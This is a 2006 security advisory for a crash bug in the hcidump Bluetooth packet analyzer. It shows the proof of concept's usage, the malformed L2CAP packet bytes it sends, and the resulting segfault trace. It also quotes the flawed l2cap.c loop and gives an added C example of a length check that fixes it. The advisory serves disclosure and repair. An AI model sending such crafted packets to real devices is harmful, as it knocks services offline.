[ Secuobs - Advisory ] Bluetooth : DoS on hcidump 1.29 + PoC

2006-02-07 00:00:00
vulners.com

[Software affected] hcidump

[Version] 1.29 (other versions may also be affected)

[Impact] Denial of Service (possibly more)

[Credits] Pierre Betouin - [email protected] - Bug found with BSS v0.6 GPL fuzzer (Bluetooth Stack Smasher)

BSS can be downloaded from http://www.secuobs.com/news/05022006-bluetooth10.shtml

[Vendor] was notified

[Original advisory]

http://www.secuobs.com/news/05022006-bluetooth9.shtml#english
http://www.secuobs.com/news/05022006-bluetooth9.shtml#french

[PoC] download it from http://www.secuobs.com/news/05022006-bluetooth8.shtml

[PoC usage]

./hcidump-crash 00:80:09:XX:XX:XX

L2CAP packet sent (15)
Buffer: 08 01 0B 00 41 41 41 41 41 41 41 41 41 41 41

hcidump

HCI sniffer - Bluetooth packet analyzer ver 1.29
device: hci0 snap_len: 1028 filter: 0xffffffff
< HCI Command: Create Connection (0x01|0x0005) plen 13

> HCI Event: Command Status (0x0f) plen 4
> HCI Event: Connect Complete (0x03) plen 11

< HCI Command: Write Link Policy Settings (0x02|0x000d) plen 4
< ACL data: handle 41 flags 0x02 dlen 19
L2CAP(s): debug : code=8
Echo req: dlen 12
L2CAP(s): debug : code=0
code 0x00 ident 0 len 0
(…)
L2CAP(s): debug : code=0
code 0x00 ident 0 len 0
segmentation fault

[Affected code location] l2cap.c

[Affected code]

while (frm->len >= L2CAP_CMD_HDR_SIZE) {
    l2cap_cmd_hdr *hdr = frm->ptr;

    if (!p_filter(FILT_L2CAP)) {
        p_indent(level, frm);
        printf("L2CAP(s): ");
    }

    frm->ptr += L2CAP_CMD_HDR_SIZE;
    frm->len -= L2CAP_CMD_HDR_SIZE;

    switch (hdr->code) {
    (...)
    default:
        if (p_filter(FILT_L2CAP))
            break;
        printf("code 0x%2.2x ident %d len %d\n",
            hdr->code, hdr->ident, btohs(hdr->len));
        raw_dump(level, frm);
    }
    frm->ptr += btohs(hdr->len);
    frm->len -= btohs(hdr->len);
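The advisory shows the affected loop but does not name the root cause. The example below is added here and is not code from the advisory or from hcidump; it assumes the failure is the unsigned `frm->len -= btohs(hdr->len)` wrapping when a signalling command header claims more bytes than remain in the frame (which matches the trace of endless `code 0x00 ... len 0` lines before the crash), and shows the remaining-length check that ends the walk instead. The `struct frame`, `walk_result` and `unchecked_remaining` names are stand-ins chosen for this example.

```c
#include <stdint.h>
#include <stdio.h>
#define L2CAP_CMD_HDR_SIZE 4

/* Stand-ins for hcidump's types (assumption: names mirror l2cap.c; the real
 * struct frame has more members). len is unsigned, as in hcidump. */
struct frame { const uint8_t *ptr; uint32_t len; };
struct walk_result { int commands; int truncated; uint32_t final_len; };

static uint16_t rd_le16(const uint8_t *p) { return (uint16_t)(p[0] | (p[1] << 8)); }

/* The subtraction the affected loop performs after the switch: with remaining
 * = 11 and claimed = 12 it yields UINT32_MAX, so the while condition stays true. */
static uint32_t unchecked_remaining(uint32_t remaining, uint16_t claimed) { return remaining - claimed; }

/* The same walk over the signalling channel, with the bound check added. */
static struct walk_result walk_signaling(const uint8_t *buf, uint32_t buflen)
{
    struct frame frm = { buf, buflen };
    struct walk_result r = { 0, 0, 0 };
    while (frm.len >= L2CAP_CMD_HDR_SIZE) {
        uint8_t code = frm.ptr[0], ident = frm.ptr[1];
        uint16_t len = rd_le16(frm.ptr + 2);       /* btohs(hdr->len) */
        frm.ptr += L2CAP_CMD_HDR_SIZE;
        frm.len -= L2CAP_CMD_HDR_SIZE;
        printf("code 0x%2.2x ident %d len %d\n", code, ident, len);
        if (len > frm.len) {      /* body would run past the end of the frame */
            r.truncated = 1;
            frm.len = 0;          /* stop: nothing after this can be trusted */
            break;
        }
        frm.ptr += len;
        frm.len -= len;
        r.commands++;
    }
    r.final_len = frm.len;
    return r;
}

int main(void)
{
    /* Constructed samples: an echo request whose header matches its 11-byte body,
     * and one whose header claims 12 bytes while only 11 follow. */
    const uint8_t ok[]  = { 0x08, 0x01, 0x0B, 0x00, 'A','A','A','A','A','A','A','A','A','A','A' };
    const uint8_t bad[] = { 0x08, 0x01, 0x0C, 0x00, 'A','A','A','A','A','A','A','A','A','A','A' };
    struct walk_result a = walk_signaling(ok, sizeof ok), b = walk_signaling(bad, sizeof bad);
    printf("ok: %d cmd (truncated %d)  bad: %d cmd (truncated %d)\n",
           a.commands, a.truncated, b.commands, b.truncated);
    return 0;
}
```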